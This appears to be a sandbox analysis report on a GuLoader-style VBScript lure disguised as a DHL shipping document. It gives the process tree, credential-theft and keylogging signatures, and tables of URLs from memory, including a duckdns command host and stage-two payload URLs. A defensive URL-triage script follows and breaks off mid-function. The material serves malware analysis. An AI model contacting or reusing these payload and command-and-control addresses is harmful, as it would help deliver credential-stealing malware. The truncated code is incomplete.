              Credentials | Domains | Default Accounts | Native API [11] | DLL Side-Loading [1] | Access Token Manipulation [1] | Obfuscated Files or Information [3] | Input Capture [11] | Account Discovery [1] | Remote Desktop Protocol | Data from Local System [1] | Encrypted Channel [11] | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution [1] | Registry Run Keys / Startup Folder [1] | Process Injection [212] | Software Packing [1] | Credentials in Registry [2] | File and Directory Discovery [2] | SMB/Windows Admin Shares | Email Collection [1] | Non-Standard Port [1] | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter [212] | Login Hook | Registry Run Keys / Startup Folder [1] | DLL Side-Loading [1] | Credentials In Files [1] | System Information Discovery [129] | Distributed Component Object Model | Input Capture [11] | Non-Application Layer Protocol [2] | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | PowerShell [2] | Network Logon Script | Network Logon Script | Masquerading [1] | LSA Secrets | Query Registry [1] | SSH | Clipboard Data [2] | Application Layer Protocol [113] | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Modify Registry [1] | Cached Domain Credentials | Security Software Discovery [341] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion [141] | DCSync | Virtualization/Sandbox Evasion [141] | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation [1] | Proc Filesystem | Process Discovery [4] | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection [212] | /etc/passwd and /etc/shadow | Application Window Discovery [1] | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery [1] | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1465419 | Sample: DHL Shipping Document Awb &... | Startdate: 01/07/2024 | Architecture: WINDOWS | Score: 100

              Process tree recovered from the behavior graph. Graph node ids are given in parentheses; the numbers in square brackets after a process name are the created-registry-value / created-file badges from the graph (see Legend).

              (2) Sample
                DNS/IP: janbours92harbu02.duckdns.org (49); 171.39.242.20.in-addr.arpa (51); 2 other IPs or domains (53)
                Signatures: Malicious sample detected (through community Yara rule); Yara detected GuLoader; Yara detected Powershell download and execute; 11 other signatures
                Signature on (49) janbours92harbu02.duckdns.org: Uses dynamic DNS services
                started -> (11) wscript.exe [1]
                  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 5 other signatures
                  started -> (14) powershell.exe [14 19]
                    DNS/IP: contemega.com.do 192.185.112.252, 443, 49707, 60918 UNIFIEDLAYER-AS-1US United States (59)
                    Signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                    started -> (18) powershell.exe [17]
                      Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Hides threads from debuggers
                      started -> (25) wab.exe [8 16]
                        DNS/IP: janbours92harbu02.duckdns.org 206.123.148.194, 3981, 60919, 60920 M247GB United States (55); geoplugin.net 178.237.33.50, 60921, 80 ATOM86-ASATOM86NL Netherlands (57)
                        Dropped: C:\Users\user\AppData\Roaming\kpburtts.dat, data (45); C:\Users\...\memvbbncbrxabktzvniruuteatm.vbs, data (47)
                        Signatures: Maps a DLL or memory area into another process; Hides threads from debuggers; Installs a global keyboard hook
                        started -> (32) wab.exe [1]: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                        started -> (35) wab.exe [1]: Tries to harvest and steal browser information (history, passwords, etc)
                        started -> (37) wab.exe [2]
                        started -> (39) 5 other processes
                          started -> (41) conhost.exe
                          started -> (43) reg.exe [1 1]
                      started -> (30) cmd.exe [1]
                    started -> (21) conhost.exe
                    started -> (23) cmd.exe [1]



              Source | Detection | Scanner | Label | Link
              DHL Shipping Document Awb & BL.vbs | 5% | ReversingLabs | Win32.Trojan.Generic |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              https://moviesmacktalk.com/Nedsl | 0% | Avira URL Cloud | safe |
              https://contemega.Pb)m | 0% | Avira URL Cloud | safe |
              http://www.imvu.comr | 0% | Avira URL Cloud | safe |
              https://contemega.com.d | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings. | 0% | Avira URL Cloud | safe |
              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.c | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagn | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagning | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Neds | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/N | 0% | Avira URL Cloud | safe |
              https://contemega.com.do | 0% | Avira URL Cloud | safe |
              http://www.nirsoft.net | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagnings.d | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslag | 0% | Avira URL Cloud | safe |
              http://www.imvu.coma | 0% | Avira URL Cloud | safe |
              https://contemega.c | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagnin | 0% | Avira URL Cloud | safe |
              https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe |
              https://www.google.com | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnin | 0% | Avira URL Cloud | safe |
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/ | 0% | Avira URL Cloud | safe |
              https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046 | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Neds | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagning | 0% | Avira URL Cloud | safe |
              https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16 | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagnings. | 0% | Avira URL Cloud | safe |
              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagni | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagni | 0% | Avira URL Cloud | safe |
              https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagnings.dw | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedsl | 0% | Avira URL Cloud | safe |
              https://contemega.com. | 0% | Avira URL Cloud | safe |
              http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe |
              https://contemega.co | 0% | Avira URL Cloud | safe |
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c& | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedsla | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/ | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings.d | 0% | Avira URL Cloud | safe |
              https://www.office.com/ | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagn | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/zPwwF47.bin | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslag | 0% | Avira URL Cloud | safe |
              http://microsoft.co | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Ne | 0% | Avira URL Cloud | safe |
              http://www.imvu.com | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings.dwpX | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.co | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Ne | 0% | Avira URL Cloud | safe |
              https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/N | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings.dw | 0% | Avira URL Cloud | safe |
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b& | 0% | Avira URL Cloud | safe |
              http://contemega.com.do | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Ned | 0% | Avira URL Cloud | safe |
              https://contemega.com.do/Nedslagnings | 0% | Avira URL Cloud | safe |
              https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877 | 0% | Avira URL Cloud | safe |
              http://crl.micro | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud | safe |
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com | 0% | Avira URL Cloud | safe |
              https://contemega.com | 0% | Avira URL Cloud | safe |
              https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Ned | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedslagnings.dwp | 0% | Avira URL Cloud | safe |
              https://moviesmacktalk.com/Nedsla | 0% | Avira URL Cloud | safe |
              http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
janbours92harbu02.duckdns.org | 206.123.148.194 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
contemega.com.do | 192.185.112.252 | true | false | | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
https://contemega.com.do/Nedslagnings.dwp | false | | unknown
https://contemega.com.do/zPwwF47.bin | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings. | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedsl | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.Pb)m | powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.c | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagn | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagning | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingth | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contemega.com.d | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Neds | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.c | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://moviesmacktalk.com/Nedslag | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/N | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do | powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.coma | wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagnings.d | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagnin | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046 | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Neds | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagning | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/ | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16 | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com | wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnin | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagnings. | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagni | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://moviesmacktalk.com/Nedslagni | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com. | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedsl | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagnings.dw | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | wab.exe | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin | wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contemega.co | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/ | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c& | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings.d | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedsla | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/ | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contemega.com.do/Nedslagn | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslag | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://microsoft.co | powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://moviesmacktalk.com/Ne | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings.dwpX | powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=wsb | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://moviesmacktalk.co | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Ne | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/N | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings.dw | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b& | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Ned | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://contemega.com.do | powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contemega.com.do/Nedslagnings | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877 | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | bhvB999.tmp.19.dr | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | wab.exe | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedsla | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contemega.com | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Ned | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moviesmacktalk.com/Nedslagnings.dwp | powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
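The string table above is dominated by every character-by-character prefix of the two stage-two URLs found in the powershell.exe dumps, plus fragments with adjacent memory glued on (https://contemega.Pb)m, the zPwwF47.binOptjsLan... string from wab.exe). The Python below is an added example, not part of the Joe Sandbox report, for reducing such a table to URLs worth acting on: it keeps every string the sandbox actually requested (the contacted-URL table above), drops strings that are strict prefixes of a longer string, and discards fragments whose host is not syntactically a hostname. The input lists are constructed from a subset of the rows above; the tier names (confirmed, candidate, discarded) are this example's own.

```python
"""Reduce a sandbox memory-string URL table to actionable URLs."""
import re
from urllib.parse import urlsplit

# Constructed subset of the strings in the table above (powershell.exe and wab.exe dumps).
SAMPLE_STRINGS = [
    "https://contemega.com.do/N",
    "https://contemega.com.do/Nedslagnings.dw",
    "https://contemega.com.do/Nedslagnings.dwp",
    "https://moviesmacktalk.com/N",
    "https://moviesmacktalk.com/Nedslagnings.dwp",
    "https://moviesmacktalk.com/Nedslagnings.dwpX",
    "https://contemega.com.do/zPwwF47.bin",
    "https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin",
    "https://contemega.Pb)m",
    "https://go.micro",
    "http://www.imvu.comr",
    "https://aka.ms/pscore68",
    "https://aka.ms/pscore6lB",
]
# The three URLs the sandbox really requested (contacted-URL table above).
CONTACTED_URLS = [
    "https://contemega.com.do/Nedslagnings.dwp",
    "https://contemega.com.do/zPwwF47.bin",
    "http://geoplugin.net/json.gp",
]

# Syntactic hostname: dot-separated letter/digit/hyphen labels and an alphabetic TLD.
HOST_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def plausible_url(s):
    """True when s parses as http(s) and its host is syntactically a hostname."""
    try:
        parts = urlsplit(s)
    except ValueError:
        return False
    host = parts.hostname or ""          # urlsplit lower-cases the host for us
    return parts.scheme in ("http", "https") and HOST_RE.match(host) is not None


def collapse_prefixes(strings):
    """Drop every string that is a strict prefix of another string in the input."""
    kept = []
    for s in sorted(set(strings), key=len, reverse=True):   # longest first
        if not any(k.startswith(s) for k in kept):
            kept.append(s)
    return sorted(kept)


def triage_urls(strings, contacted):
    """Tier memory strings into confirmed / candidate / discarded URLs.

    confirmed: strings the sandbox really requested; kept even when a longer
               junk-suffixed neighbour would otherwise hide them as a prefix
    candidate: remaining maximal strings whose host is syntactically valid
    discarded: strict prefixes and fragments with an invalid host
    """
    uniq = set(strings)
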